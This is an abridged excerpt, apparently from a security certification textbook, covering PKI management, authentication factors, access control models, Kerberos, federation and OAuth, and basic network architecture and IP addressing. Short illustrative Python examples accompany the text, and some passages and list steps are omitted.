1. In an FDE product, what type of cipher is used for a key encrypting key?
Lesson 3
Summary
• Asymmetric key pair for key exchange: RSA 2,048-bit or ECDHE 256-bit
• Determine certificate policies and types that meet the needs of users and
business workflows, such as server/machine, email/user, and code-signing
certificate types. Ensure that the attribute fields are correctly configured when
issuing certificates, taking special care to ensure that the SAN field lists domains,
subdomains, or wildcard domains by which a server is accessed.
• Create policies and procedures for users and servers to submit CSRs, plus the
identification, authentication, and authorization processes to ensure certificates
are only issued to valid subjects.
• Set up procedures for managing keys and certificates, including revocation and
backup/escrow of keys, ideally using dedicated hardware cryptoprocessors, such
as TPMs and HSMs.
LESSON INTRODUCTION
Each network user and host device must be identified with an account so that you
can control their access to your organization’s applications, data, and services. The
processes that support this requirement are referred to as identity and access
management (IAM). Within IAM, authentication technologies ensure that only valid
subjects (users or devices) can operate an account. Authentication requires the
account holder to submit credentials that should only be known or held by them in
order to access the account. There are many authentication technologies, and it is
imperative that you be able to implement and maintain these security controls.
As well as ensuring that only valid users and devices connect to managed networks
and devices, you must ensure that these subjects are authorized with only the
necessary permissions and privileges to access and change resources. These tasks
are complicated by the need to manage identities across on-premises networks,
cloud services, and web/mobile apps.
Lesson Objectives
In this lesson, you will do the following:
• Implement password-based and multifactor authentication.
Topic 4A
Authentication
Assuming that an account has been created securely and the identity of the account
holder has been verified, authentication verifies that only the account holder is
able to use the account and that the system may only be used by account holders.
Authentication technologies allow the use not only of passwords, but also of
biometric and token factors to better secure accounts. Understanding the strengths
and weaknesses of these factors will help you to implement and maintain strong
authentication systems.
Authentication Design
Authentication is performed when a supplicant or claimant presents credentials
to an authentication server. The server compares what was presented
to the copy of the credentials it has stored. If they match, the account is
authenticated. Authentication design refers to selecting a technology that meets
requirements for confidentiality, integrity, and availability:
• Confidentiality, in terms of authentication, is critical, because if account
credentials are leaked, threat actors can impersonate the account holder and act
on the system with whatever rights they have.
• Integrity means that the authentication mechanism is reliable and not easy for
threat actors to bypass or trick with counterfeit credentials.
• Availability means that the time taken to authenticate does not impede
workflows and that the mechanism is easy enough for users to operate.
There are many different technologies for defining credentials. These can be
categorized as factors. The longest-standing authentication factor is “Something
You Know” or a knowledge factor.
The typical knowledge factor is the login, composed of a username and a password.
The username is typically not a secret (although it should not be published openly),
but the password must be known only to the account holder. A passphrase is a
longer password composed of several words. This has the advantages of being
more secure and easier to remember.
Password Concepts
Improper credential management continues to be one of the most fruitful vectors
for network attacks. If an organization must continue to rely on password-based
credentials, its usage needs to be governed by strong policies and training.
A password best practices policy instructs users on choosing and maintaining
passwords. More generally, a credential management policy should instruct users
on how to keep their authentication method secure, whether this be a password,
smart card, or biometric ID. The credential management policy also needs to alert
users to diverse types of social engineering attacks. Users need to be able to spot
phishing and pharming attempts, so that they do not enter credentials into an
unsecure form or spoofed site.
To supplement best practice awareness, system-enforced account policies can
help to enforce credential management principles by stipulating requirements for
user-selected passwords:
• Password Length—enforces a minimum length for passwords. There may also
be a maximum length.
• Password Age—forces the user to select a new password after a set number
of days.
Password aging and expiration can mean the same thing. However, some systems
distinguish between them. If this is the case, aging means that the user can still log on
with the old password after the defined period, but they must then immediately choose
a new password. Expiration means that the user can no longer sign in with the outdated
password and the account is effectively disabled.
You should note that the most recent guidance issued by NIST (nvlpubs.nist.gov/
nistpubs/SpecialPublications/NIST.SP.800-63b.pdf) deprecates some of the "traditional"
elements of password best practices, such as complexity, aging, and the use of
password hints.
Password reuse can also mean using a work password elsewhere (on a retail website,
for instance). This sort of behavior can only be policed by soft policies.
Password Managers
Users often adopt poor credential management practices that are hard to control,
such as using the same password for corporate networks and consumer websites.
This makes enterprise network security vulnerable to data breaches from these
websites. This risk is mitigated by a password manager:
1. The user selects a password manager app or service. Most operating systems
and browsers implement password managers. Examples include Windows
Credential Manager and Apple’s iCloud Keychain. If using a third-party
password manager, the user installs a plug-in for their chosen browser.
2. The user secures the password vault with a master password. The vault
is likely to be stored in the cloud so that accounts can be accessed across
multiple devices, but some password managers offer local storage only.
4. When the user subsequently browses a site, the password manager validates
the site’s identity using its digital certificate and presents an option for the
user to fill in the password.
The main risks from password managers are selection of a weak master password,
compromise of the vendor’s cloud storage or systems, and impersonation attacks
designed to trick the manager into filling a password to a spoofed site.
Multifactor Authentication
An authentication design that uses only passwords or a single knowledge factor is
considered weak. Password secrets are too prone to compromise to be reliable.
Other types of authentication factor can be used to supplement or replace
password-based logins. A multifactor authentication (MFA) technology combines
the use of more than one type of factor.
You might also see references to two-factor authentication (2FA). This just means that
there are precisely two factors involved, such as an ownership-based smart card or
biometric identifier with something you know, such as a password or PIN.
Biometric Authentication
The first step in setting up biometric authentication is enrollment:
1. A sensor module acquires the biometric sample from the target.
When the user wants to access a resource, they are re-scanned, and the scan is
compared to the template. If they match to within a defined degree of tolerance,
access is granted.
Biometric authentication can be challenging to implement. The efficacy rate of
biometric pattern acquisition and matching, and suitability as an authentication
mechanism, can be evaluated using the following metrics and factors:
• False Rejection Rate (FRR)—is where a legitimate user is not recognized.
This is also referred to as a Type I error or false non-match rate (FNMR). FRR is
measured as a percentage.
• False Acceptance Rate (FAR)—is where an interloper is accepted. This is also
referred to as a Type II error or false match rate (FMR). FAR is measured as a
percentage.
False rejection causes inconvenience to users, but false acceptance can lead
to security breaches, and so is usually considered the most important metric.
• Crossover Error Rate (CER)—the point at which FRR and FAR meet. The lower
the CER, the more efficient and reliable the technology.
Errors are reduced over time by tuning the system. This is typically accomplished
by adjusting the sensitivity of the system until CER is reached.
• Throughput (speed)—is the time required to create a template for each user
and the time required to authenticate. This is a major consideration for high-
traffic access points, such as airports or railway stations.
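Tuning toward the CER can be sketched as a sweep over the acceptance threshold, given sample match scores (the scores below are invented for illustration, not from a real sensor):

```python
# Match scores produced when scanning genuine users vs. impostors.
genuine = [0.91, 0.85, 0.78, 0.88, 0.60, 0.95]
impostor = [0.20, 0.35, 0.55, 0.15, 0.65, 0.30]

def rates(threshold):
    """FRR (Type I) and FAR (Type II) at a given acceptance threshold."""
    frr = sum(s < threshold for s in genuine) / len(genuine)
    far = sum(s >= threshold for s in impostor) / len(impostor)
    return frr, far

# Sweep thresholds from 0.00 to 1.00 to find where FRR and FAR cross (CER).
best = min((abs(f - a), t)
           for t in [i / 100 for i in range(101)]
           for f, a in [rates(t)])[1]
frr, far = rates(best)
print(f"CER threshold ~{best:.2f}: FRR={frr:.2f}, FAR={far:.2f}")
```

Raising the threshold above the crossover point rejects more impostors but also more legitimate users, which is the trade-off the tuning process balances.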
Facial recognition records multiple indicators about the size and shape of the face
like the distance between the eyes or the width and length of the nose. The scan
usually uses optical and infrared cameras or sensors to defeat spoofing attempts
that substitute a photo for a real face.
There are also simpler smart cards and fobs that simply transmit a static token
programmed into the device. For example, many building entry systems work on the
basis of static codes. These mechanisms are highly vulnerable to cloning and replay
attacks.
Soft tokens sent via SMS or email do not really count as an ownership factor. These
systems can be described as two-step verification rather than MFA. The tokens are
highly vulnerable to interception.
A more secure soft OTP token can be generated using an authenticator app. This
is software installed on a computer or smartphone. The user must register each
identity provider with the app, typically using a scannable quick response (QR)
code to communicate the shared secret. When prompted to authenticate, the
user must unlock the authenticator app with their device credential to view the
OTP token. There is less risk of interception than with an SMS or email message,
but as it runs on a shared-use device, there is the possibility that malware could
compromise the app.
Using an authenticator app to sign in to a site. After the user signs in with a password,
the site prompts them to authorize the sign in using the authenticator app installed
on their smartphone.
Passwordless Authentication
With token-based MFA, the user account is typically still configured with a
password. This might be used as a backup mechanism or there might be a two-step
verification process, where the user must enter their password and then submit
an OTP.
Passwordless means that the whole authentication system no longer processes
knowledge-based factors. The FIDO2 and WebAuthn specifications provide a
framework for passwordless authentication. It works as follows:
1. The user chooses either a roaming authenticator, such as a security key, or a
platform authenticator implemented by the device OS, such as Windows Hello
or Face ID/Touch ID for macOS and iOS.
2. The user configures a secure method or local gesture to confirm presence and
authenticates the device. This gesture could be a fingerprint, face recognition,
or PIN. This credential is only ever validated locally by the authenticator.
5. The relying party uses the public key to verify the signature and authenticate
the account session.
As with FIDO U2F, this provides similar security to smart card authentication,
but does not require accounts to have digital certificates and PKI, reducing the
management burden. FIDO2 WebAuthn improves on FIDO U2F by adding an
application programming interface (API) that allows web applications to work
without a password element to authentication. Most FIDO U2F authenticators
should also support FIDO2/WebAuthn.
For a passwordless system to be secure, the authenticator must be trusted
and resistant to spoofing or cloning attacks. Attestation is a mechanism for an
authenticator device, such as a FIDO security key or the TPM in a PC or laptop, to
prove that it is a root of trust. Each security key is manufactured with an attestation
key and model ID. During the registration step, if the relying party requires attestation,
the authenticator uses this key to sign a report. The relying party can check the
attestation report to verify that the authenticator is a known brand and model and
supports whatever cryptographic properties the relying party demands.
Note that the attestation key is not unique; if it were unique, it would be easy to identify
individuals and be a serious threat to privacy. Instead, it identifies a particular brand
and model.
Review Activity:
Authentication
6. Apart from cost, what would you consider to be the major considerations
for evaluating a biometric recognition technology?
7. True or false? When implementing smart card login, the user’s private
key is stored on the smart card.
Topic 4B
Authorization
Authorization is the part of identity and access management that governs assigning
privileges to network users and services. Implementing an access control model
helps an organization to manage the implications of privilege assignments and to
account for the actions of both regular and privileged administrative users. Account
policies help you to protect credentials and to detect and manage risks from
compromised accounts.
As a simple classification system is inflexible, most MAC models add the concept of
compartment-based access. For example, a data file might be at Secret classification
and located in the HR compartment. Only subjects with Secret and HR clearance could
access the file.
In MAC, users with high clearance are not permitted to write low-clearance documents.
This is referred to as write up, read down. This prevents, for example, a user with Top
Secret clearance republishing some Top Secret data that they can access with Secret
clearance.
RBAC can be partially implemented by mapping security groups onto roles, but they
are not identical schemes. Membership in security groups is largely discretionary
(assigned by administrators rather than determined by the system). Also, ideally, a
principal should only inherit the permissions of a role to complete a particular task
rather than retain them permanently. Administrators should be prevented from
escalating their own privileges by assigning roles to their own accounts arbitrarily or
boosting a role’s permissions.
For example, a user may be granted elevated privileges temporarily. In this case, a
system is needed to ensure that the privileges are revoked at the end of the agreed
period. A system of auditing should regularly review privileges, monitor group
membership, review access control lists for each resource, and identify and disable
unnecessary accounts.
Deprovisioning is the process of removing the access rights and permissions allocated
to an employee when they leave the company or from a contractor when a project
finishes. This involves removing the account from any roles or security groups. The
account might be disabled for a period and then deleted or deleted immediately.
Configuring access policies and rights using Group Policy Objects in Windows Server 2016.
(Screenshot used with permission from Microsoft.)
Account Restrictions
Policy-based restrictions can be used to mitigate some risks of account compromise
through the theft of credentials.
Location-Based Policies
A user or device can have a logical network location, identified by an IP address,
subnet, virtual LAN (VLAN), or organizational unit (OU). This can be used as an
account restriction mechanism. For example, a user account may be prevented
from logging on locally to servers within a restricted OU.
The geographical location of a user or device can be calculated using a geolocation
mechanism:
• IP address—can be associated with a map location to varying degrees of
accuracy based on information published by the registrant, including name,
country, region, and city. The registrant is usually the Internet service provider
(ISP), so the information you receive will provide an approximate location of a
host based on the ISP. If the ISP is one that serves a large or diverse geographical
area, it is more difficult to pinpoint the location of the host. Software libraries,
such as GeoIP, facilitate querying this data.
Time-Based Restrictions
The main types of time-based policies include the following:
• A time-of-day restrictions policy establishes authorized login hours for an
account.
• An impossible travel time/risky login policy tracks the location of login events
over time. If successive logins occur from locations that the user could not
plausibly have traveled between in the time available, the attempt is refused and
the account can be disabled. For example, a user logs in to an account from a
device in New York City. A couple of hours later, a login attempt is made from
Los Angeles, but it is refused and an alert is raised because it is not feasible for
the user to be in both locations.
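The impossible travel check can be sketched with a great-circle distance calculation. The coordinates, threshold speed, and function names here are illustrative assumptions, not a production detection rule.

```python
import math
from datetime import datetime

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points in kilometers."""
    r = 6371  # mean Earth radius, km
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp = math.radians(lat2 - lat1)
    dl = math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))

def impossible_travel(prev, curr, max_kmh=900):
    """Flag a login if the implied travel speed exceeds a plausible airliner speed."""
    hours = (curr["time"] - prev["time"]).total_seconds() / 3600
    if hours <= 0:
        return True
    km = haversine_km(prev["lat"], prev["lon"], curr["lat"], curr["lon"])
    return km / hours > max_kmh

# New York City, then Los Angeles two hours later (coordinates approximate).
nyc = {"lat": 40.7128, "lon": -74.0060, "time": datetime(2024, 1, 1, 9, 0)}
lax = {"lat": 34.0522, "lon": -118.2437, "time": datetime(2024, 1, 1, 11, 0)}
print(impossible_travel(nyc, lax))  # NYC to LA is roughly 3,900 km; 2 h implies ~1,970 km/h
```

Real risky-login systems combine this with device fingerprinting and VPN/proxy detection, since geolocation by IP address is only approximate.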
Users with administrative privileges must take the greatest care with credential
management. Privileged access accounts must use strong passwords and, ideally,
multifactor authentication (MFA) or passwordless authentication.
Review Activity:
Authorization
3. What is the process of ensuring accounts are only created for valid
users, only assigned the appropriate privileges, and that the account
credentials are known only to the valid user?
4. What is the policy that states users should be allocated the minimum
sufficient permissions?
Topic 4C
Identity Management
While an on-premises network can use a local directory to manage accounts and
rights, as organizations move services to the cloud, these authorizations have to be
implemented using federated identity management solutions.
Windows Authentication
Windows authentication involves a complex architecture of components (docs.
microsoft.com/en-us/windows-server/security/windows-authentication/
credentials-processes-in-windows-authentication), but the following three scenarios
are typical:
• Windows local sign-in—the Local Security Authority Subsystem Service
(LSASS) compares the submitted credential to a hash stored in the Security
Accounts Manager (SAM) database, which is part of the registry. This is also
referred to as interactive logon.
• Windows network sign-in—LSASS can pass the credentials for
authentication to an Active Directory (AD) domain controller. The preferred
system for network authentication is based on Kerberos, but legacy network
applications might use NT LAN Manager (NTLM) authentication.
• Remote sign-in—if the user’s device is not directly connected to the
local network, authentication can take place over a virtual private network
(VPN), enterprise Wi-Fi, or web portal. These methods use protocols that create
a secure connection between the client machine, the remote access device, and
the authentication server.
Linux Authentication
In Linux, local user account names are stored in /etc/passwd. When a user
logs in to a local interactive shell, the password is checked against a hash stored in
/etc/shadow. Interactive login over a network is typically accomplished using
Secure Shell (SSH). With SSH, the user can be authenticated using cryptographic
keys instead of a password.
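The /etc/passwd record format can be illustrated with a small parser. The sample entry below is made up; the "x" in the password field indicates that the actual hash is held in /etc/shadow, as described above.

```python
# Parse a record in /etc/passwd format (seven colon-separated fields:
# name, password placeholder, UID, GID, GECOS comment, home dir, shell).
def parse_passwd_line(line):
    name, pw, uid, gid, gecos, home, shell = line.strip().split(":")
    return {"name": name, "uid": int(uid), "gid": int(gid),
            "home": home, "shell": shell}

# Illustrative entry — the "x" means the hash lives in /etc/shadow.
entry = parse_passwd_line("sam:x:1000:1000:Sam Smith:/home/sam:/bin/bash")
print(entry["name"], entry["uid"])  # sam 1000
```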
A pluggable authentication module (PAM) is a package for enabling different
authentication providers, such as smart-card log-in. The PAM framework can also
be used to implement authentication to network directory services.
Directory Services
A directory service stores information about users, computers, security groups/
roles, and services. Each object in the directory has a number of attributes. The
directory schema describes the types of attributes, what information they contain,
and whether they are required or optional. In order for products from different
vendors to be interoperable, most directory services are based on the Lightweight
Directory Access Protocol (LDAP), which was developed from a standard called
X.500.
Within an X.500-like directory, a distinguished name (DN) is a collection of
attributes that define a unique identifier for any given resource. A distinguished
name is made up of attribute-value pairs, separated by commas. The most specific
attribute is listed first, and successive attributes become progressively broader. This
most specific attribute is the relative distinguished name, as it uniquely identifies
the object within the context of successive (parent) attribute values.
Some of the attributes commonly used include common name (CN), organizational
unit (OU), organization (O), country (C), and domain component (DC).
For example, the distinguished name of a web server operated by Widget in the UK
might be the following:
CN=WIDGETWEB, OU=Marketing, O=Widget, C=UK,
DC=widget, DC=foo
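Splitting a distinguished name into its attribute-value pairs can be sketched as follows. This naive parser assumes no escaped commas inside values, which real LDAP DNs can contain.

```python
def parse_dn(dn):
    """Split a distinguished name into (attribute, value) pairs.

    Naive sketch: does not handle escaped commas within values.
    """
    return [tuple(part.strip().split("=", 1)) for part in dn.split(",")]

dn = "CN=WIDGETWEB, OU=Marketing, O=Widget, C=UK, DC=widget, DC=foo"
pairs = parse_dn(dn)
print(pairs[0])   # ('CN', 'WIDGETWEB') — the relative distinguished name
print(pairs[1:])  # the successively broader parent attributes
```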
Kerberos can authenticate human users and application services. These are
collectively referred to as principals. Using authentication to a Windows domain
as an example, the first step in Kerberos SSO is to authenticate with a KDC server,
implemented as a domain controller.
1. The principal sends the authentication service (AS) a request for a Ticket
Granting Ticket (TGT). This is composed by encrypting the date and time on
the local computer with the user’s password hash as the key.
The password hash itself is not transmitted over the network. Although we refer to
passwords for simplicity, the system can use other authenticators, such as smart
card login.
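This first exchange can be illustrated with a stand-in. Real Kerberos encrypts the timestamp with a key derived from the password; here an HMAC over the timestamp, keyed with the password hash, plays the same conceptual role of proving knowledge of the secret without sending the password itself. All names and values are illustrative.

```python
import hashlib
import hmac
from datetime import datetime, timezone

# Stand-in for Kerberos pre-authentication: real Kerberos ENCRYPTS a
# timestamp with a key derived from the password. An HMAC is used here
# purely for illustration — proof of knowledge of the key, with neither
# the password nor its hash crossing the network.
password_hash = hashlib.sha256(b"CorrectHorse").digest()
timestamp = datetime(2024, 1, 1, 9, 0, tzinfo=timezone.utc).isoformat().encode()

authenticator = hmac.new(password_hash, timestamp, hashlib.sha256).hexdigest()

# The AS holds the same hash and recomputes the value to validate the request.
expected = hmac.new(password_hash, timestamp, hashlib.sha256).hexdigest()
print(hmac.compare_digest(authenticator, expected))  # True
```

The timestamp also lets the AS reject stale requests, which is why Kerberos requires clocks to be closely synchronized.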
2. The AS checks that the user account is present, that it can decode the request
by matching the user’s password hash with the one in the Active Directory
database, and that the request has not expired. If the request is valid, the AS
responds with the following data:
The TGT is an example of a logical token. All the TGT does is identify who you are
and confirm that you have been authenticated—it does not provide you with access
to any domain resources.
3. The principal sends the TGS a copy of its TGT and the name of the application
server it wishes to access plus an authenticator, consisting of a time-stamped
client ID encrypted using the TGS session key.
The TGS should be able to decrypt both messages using the KDC’s secret key
for the first and the TGS session key for the second. This confirms that the
request is genuine. It also checks that the ticket has not expired and has not
been used before (replay attack).
• A Service session key—is used between the client and the application
server. This is encrypted with the TGS session key.
4. The principal forwards the service ticket, which it cannot decrypt, to the
application server.
5. The application server decrypts the service ticket to obtain the service
session key using its secret key, confirming that the principal has sent it an
untampered message. It then decrypts the authenticator using the service
session key.
6. Optionally, the application server responds to the principal with the timestamp
from the authenticator, encrypted using the service session key. This proves the
server’s identity to the principal (mutual authentication).
7. The server now responds to access requests (assuming they conform to the
server’s access control list).
One of the noted drawbacks of Kerberos is that the KDC represents a single
point-of-failure for the network. In practice, backup KDC servers can be
implemented (for example, Active Directory supports multiple domain controllers,
each of which are running the KDC service).
Federation
Federation is the notion that a network needs to be accessible to more than just
a well-defined group of employees. In business, a company might need to make
parts of its network open to partners, suppliers, and customers. The company
can manage its employee accounts easily enough. Managing accounts for each
supplier or customer internally may be more difficult. Federation means that the
company trusts accounts created and managed by a different network. As another
example, in the consumer world, a user might want to use both Google Workspace
and Twitter. If Google and Twitter establish a federated network for the purpose
of authentication and authorization, then the user can log on to Twitter using their
Google credentials or vice versa.
2. The principal authenticates with the identity provider and obtains a claim, in
the form of some sort of token or document signed by the IdP.
3. The principal presents the claim to the service provider. The SP can validate
that the IdP has signed the claim because of its trust relationship with the IdP.
4. The service provider can now connect the authenticated principal to its own
accounts database to determine its permissions and other attributes. It may
be able to query attributes of the user account profile held by the IdP, if the
principal has authorized this type of access.
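Steps 2 and 3 can be sketched with a signed-claim stand-in. Real federations use standards such as SAML or OpenID Connect with asymmetric signatures; this HMAC version, with made-up names, only illustrates how the SP's trust in the IdP's key lets it validate claims it did not issue.

```python
import hashlib
import hmac
import json

# Hypothetical shared trust: the SP has previously exchanged a verification
# key with the IdP (real federations use asymmetric signatures and
# certificates rather than a shared secret).
idp_key = b"idp-signing-key-demo"

def idp_issue_claim(subject):
    """IdP authenticates the principal, then issues a signed claim."""
    claim = json.dumps({"sub": subject, "idp": "idp.example"}).encode()
    sig = hmac.new(idp_key, claim, hashlib.sha256).hexdigest()
    return claim, sig

def sp_validate(claim, sig):
    """SP checks the signature using its trust in the IdP's key."""
    expected = hmac.new(idp_key, claim, hashlib.sha256).hexdigest()
    return hmac.compare_digest(sig, expected)

claim, sig = idp_issue_claim("alice")
print(sp_validate(claim, sig))         # True
print(sp_validate(claim + b"x", sig))  # False — a tampered claim is rejected
```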
Open Authorization
Many public clouds use application programming interfaces (APIs) based on
Representational State Transfer (REST) rather than SOAP. These are called
RESTful APIs. Where SOAP is a tightly specified protocol, REST is a looser
architectural framework. This allows the service provider more choice over
implementation elements. Compared to SOAP and SAML, there is better support
for mobile apps.
Authentication and authorization for a RESTful API are often implemented using
the Open Authorization (OAuth) protocol. OAuth is designed to facilitate sharing
of information (resources) within a user profile between sites. The user creates a
password-protected account at an identity provider (IdP). The user can link that
identity to an OAuth consumer site without giving the password to the consumer
site. A user (resource owner) can grant an OAuth client authorization to access
some part of their account. A client in this context is an app or consumer site.
The user account is hosted by one or more resource servers. A resource server
is called an API server because it hosts the functions that allow OAuth clients
(consumer sites and mobile apps) to access user attributes. An authorization
server processes authorization requests. A single authorization server can manage
multiple resource servers; equally, the resource and authorization server could be
the same server instance.
The client app or service must be registered with the authorization server. As part
of this process, the client registers a redirect URL, which is the endpoint that will
process authorization tokens. Registration also provides the client with an ID and
a secret. The ID can be publicly exposed, but the secret must be kept confidential
between the client and the authorization server. When the client application
requests authorization, the user approves the authorization server to grant the
request using an appropriate method. OAuth supports several grant types—or
flows—for use in different contexts, such as server to server or mobile app to
server. Depending on the flow type, the client will end up with an access token
validated by the authorization server. The client presents the access token to the
resource server, which then accepts the request for the resource if the token is
valid.
OAuth uses the JavaScript Object Notation (JSON) Web Token (JWT) format
for claims data. JWTs can be passed as Base64-encoded strings in URLs and HTTP
headers and can be digitally signed for authentication and integrity.
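The Base64url encoding of JWT segments can be demonstrated with the standard library. The token below is constructed locally for illustration and is unsigned; real JWTs carry a signature over the first two segments in the third segment.

```python
import base64
import json

def b64url_decode(segment):
    """Decode a Base64url segment, restoring any stripped '=' padding."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)

# Build a sample unsigned JWT for illustration: header.payload.signature,
# with each segment Base64url-encoded and padding stripped.
header = base64.urlsafe_b64encode(
    json.dumps({"alg": "none", "typ": "JWT"}).encode()).rstrip(b"=").decode()
payload = base64.urlsafe_b64encode(
    json.dumps({"sub": "alice"}).encode()).rstrip(b"=").decode()
token = f"{header}.{payload}."

h, p, _ = token.split(".")
print(json.loads(b64url_decode(p)))  # {'sub': 'alice'}
```

Because the claims are only encoded, not encrypted, anyone holding the token can read them; the signature provides integrity, not confidentiality.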
Review Activity:
Identity Management
5. You are working on a cloud application that allows users to log on with
social media accounts over the web and from a mobile application.
Which protocols would you consider, and which would you choose as
most suitable?
Lesson 4
Summary
You should be able to assess the design and use of authentication products in
terms of meeting confidentiality, integrity, and availability requirements. Given
a product-specific setup guide, you should be able to implement protocols and
technologies such as MFA, passwordless authentication, Kerberos SSO, and
federated identity management.
• Ownership factors include smart cards, OTP keys/fobs and security keys, and
OTP authenticator apps installed on a trusted device.
LESSON INTRODUCTION
Managing user authentication and authorization is only one part of building secure
information technology services. The network infrastructure must also be designed
to run services with the properties of confidentiality, integrity, and availability. While
design might not be a direct responsibility for you at this stage in your career, you
should understand the factors that underpin design decisions, so that you can
assist with analysis and planning.
Lesson Objectives
In this lesson, you will do the following:
• Compare and contrast security implications of different on-premises network
architecture models.
Topic 5A
Enterprise Network Architecture
While you may not be responsible for network design in your current role, it is
important that you understand the vulnerabilities that can arise from weaknesses
in network architecture, and some of the general principles for ensuring a well-
designed network. This will help you to contribute to projects to improve resiliency
and to make recommendations for improvements.
• Network applications are the services that run on the infrastructure to support
business activities, such as processing invoices or sending email.
• Data assets are the information that is created, stored, and transferred as a
result of business activity.
Secure network infrastructure and application architecture are put there to support
secure business workflows. A workflow is a series of tasks that a business needs
to perform, such as accepting customer orders from a web store. Remember that
security means the attributes of confidentiality, integrity, and availability.
Analyzing the systems involved in provisioning email can illustrate the sorts of
architecture decisions that need to be made:
• Access—the client device must access the network via a physical channel and
obtain a logical address. The user must be authenticated and authorized to use
the email application. The corollary is that unauthorized users and devices must
be denied access.
• Email mailbox server—the mailbox stores data assets and must only be
accessed by authorized clients, and conversely, must be fully available and
fault tolerant to support the genuine user. The email service must run with a
minimum number of dependencies over network infrastructure that is resilient
to faults.
This type of business flow will involve systems with different security requirements.
Placing the client, the mailbox, and the mail transfer server all within the same
segment will introduce many vulnerabilities. Understanding and controlling how
data flows between these network segments is a key part of secure and effective
network architecture design.
Network Infrastructure
It is helpful to use a layer model to analyze network infrastructure and services. The
Open Systems Interconnection (OSI) model is a widely quoted example of how to
define layers of network functions.
A network is made up of nodes and links. At the physical (PHY) layer, or layer 1 in
the OSI model, links are implemented as twisted-pair cables transmitting electrical
signals, fiber optic cables carrying infrared light signals, or as wireless devices
transmitting radio waves.
There are two types of nodes. A host node is one that initiates data transfers. Hosts
are usually either servers or clients. An intermediary node forwards traffic around the
network. This forwarding occurs at different layers and with different scopes. A network
with the scope of a single site is referred to as a local area network (LAN). Networks that
span metropolitan, country-wide, or global scopes are called wide area networks (WANs).
Each network node must be identifiable via a unique address. This addressing
function also takes place at different layers with different scopes.
Forwarding and addressing functions are handled by the following network
appliances and protocols:
• Switches forward frames between nodes in a cabled network. The network
adapter in each host is connected to a switch port via a cable. Switches work
at layer 2 of the OSI model. Most LANs use networks based on the Ethernet
standard. An Ethernet switch makes forwarding decisions based on the
hardware or media access control (MAC) address of attached hosts. A MAC
address is a 48-bit value written in hexadecimal notation, such as 00-15-5D-01-
CA-4A. This addressing works within the local network segment only. This is
referred to as a broadcast domain.
Appliances, protocols, and addressing functions within the OSI network layer reference model.
(Images © 123RF.com.)
• Wireless access points provide a bridge between a cabled network and wireless
hosts, or stations. Access points work at layer 2 of the OSI model. Wireless
devices also use MAC addressing at layer 2.
• Domain Name System (DNS) servers host name records and perform name
resolution to allow applications and users to address hosts and services using
fully qualified domain names (FQDNs) rather than IP addresses. DNS also works
at layer 7 of the OSI model, but is an infrastructure service, rather than a user-
level service, like web browsing.
The OSI model has three upper layers. In practical terms, distinguishing the functions of
layers 5, 6, and 7 isn't that helpful, so just think of applications working at layer 7.
• Structured cabling is run from each wall port through wall and ceiling conduits or
voids to a patch panel.
• Another patch cable connects the port on the patch panel port to a switch port.
This can be described as a star topology. The switch sits at the center with links
to hosts radiating out. The switch can establish data links between any two hosts
that are attached to it. Also, if a host sends a broadcast to all local nodes, the
switch ensures that it is received by all the connected hosts. This is referred to as a
broadcast domain. The hosts are all part of the same layer 2 local network segment.
This basic star topology exhibits a number of issues. Broadcast domains with
hundreds of hosts suffer performance penalties. The network segment is also “flat”
in terms of security. Any host can communicate freely with any other host in the
same segment.
These drawbacks mean that large networks use a hierarchical design with two or
three forwarding layers. In the hierarchical design, there are a number of blocks
served by access switches. Each access block is a star topology for a group or block
of network hosts served by an access switch. The access switches are connected
by routers. These routers create separate broadcast domains and can control the
flow of traffic between blocks. As each block can have different access policies, this
topology allows the creation of a zone-based security model.
Network with a basic hierarchical structure. Access switches implement blocks of hosts with similar
security properties, such as printers, workstations, servers, and guest devices. Communications
within a block use MAC addressing and the forwarding function of the access switch.
Communications between these blocks must flow through routers in a core layer and
use IP addressing.
You will often see the term "layer 3 switch". These are appliances that implement the
core network. They perform a combination of routing and switching. There are many
types of switches with different roles to play in on-premises and datacenter network
architectures.
While client workstations connect to network switches via wall ports and patch panels,
servers and core networking appliances are usually installed to a separate, secure area,
referred to as an equipment room or server room. Server computers can be connected
directly to switch ports using patch cables.
Internet Protocol
Internet Protocol (IP) provides the addressing mechanism for logical networks and
subnets. A 32-bit IP version 4 (IPv4) address is written in dotted decimal notation,
with either a network prefix or subnet mask to divide the address into network
ID and host ID portions. For example, in the IP address 10.1.1.0/24, the /24 prefix
indicates that the first three-quarters of the address (10.1.1.x) is the network ID,
while the remainder uniquely identifies a host on that network. This /24 prefix can
also be written as a subnet mask in the form 255.255.255.0.
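The equivalence between prefix notation and subnet mask can be verified with Python's standard ipaddress module:

```python
import ipaddress

net = ipaddress.ip_network("10.1.1.0/24")
print(net.netmask)          # 255.255.255.0 — the /24 prefix as a mask
print(net.network_address)  # 10.1.1.0 — the network ID portion
print(net.num_addresses)    # 256 — host ID range within the subnet

# Membership testing shows which subnet a host address belongs to.
host = ipaddress.ip_address("10.1.1.50")
print(host in net)          # True
```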
In the hierarchical network architecture, each access block can be designated as a
separate IP subnet. This system of layer 3 logical addressing makes it easier to write
access control rules for what traffic is allowed to flow between blocks or zones.
Each access block has been allocated a subnet. The guest network is logically separate
from the enterprise LAN and uses a completely different IP network.
Networks can also use 128-bit IPv6 addressing. IPv6 addresses are written using hex
notation in the general format: 2001:db8::abc:0:def0:1234. In IPv6, the last 64 bits
are fixed as the host’s interface ID. The first 64 bits contain network information in
a set hierarchy. For example, an ISP’s routers can use the first 48 bits to determine
where the network is hosted on the global Internet. Within that network, the site
administrator can use the remaining 16 bits (out of 64) to divide the local network
into subnets.
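The /48 routing prefix, 16 subnet bits, and 64-bit interface ID can be examined with the same ipaddress module; the networks below are built around the example address above.

```python
import ipaddress

addr = ipaddress.ip_address("2001:db8::abc:0:def0:1234")
routing_prefix = ipaddress.ip_network("2001:db8::/48")  # ISP-level routing
subnet = ipaddress.ip_network("2001:db8::/64")          # one site subnet

print(addr in routing_prefix)  # True — matches on the first 48 bits
print(addr in subnet)          # True — matches on the first 64 bits
print(2 ** 16)                 # 65536 — number of /64 subnets in one /48
```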
A packet that is sent via IP has to be forwarded using layer 2 addressing. IPv4 uses the
Address Resolution Protocol (ARP) to map a host's IP interface to a MAC address. IPv6
